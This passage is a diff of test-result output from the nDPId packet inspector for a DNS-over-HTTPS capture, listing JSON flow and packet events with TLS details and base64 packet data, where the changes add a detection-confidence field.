7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKmoMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YEVOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"}
-00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02340{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJT7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCVwHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"}
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
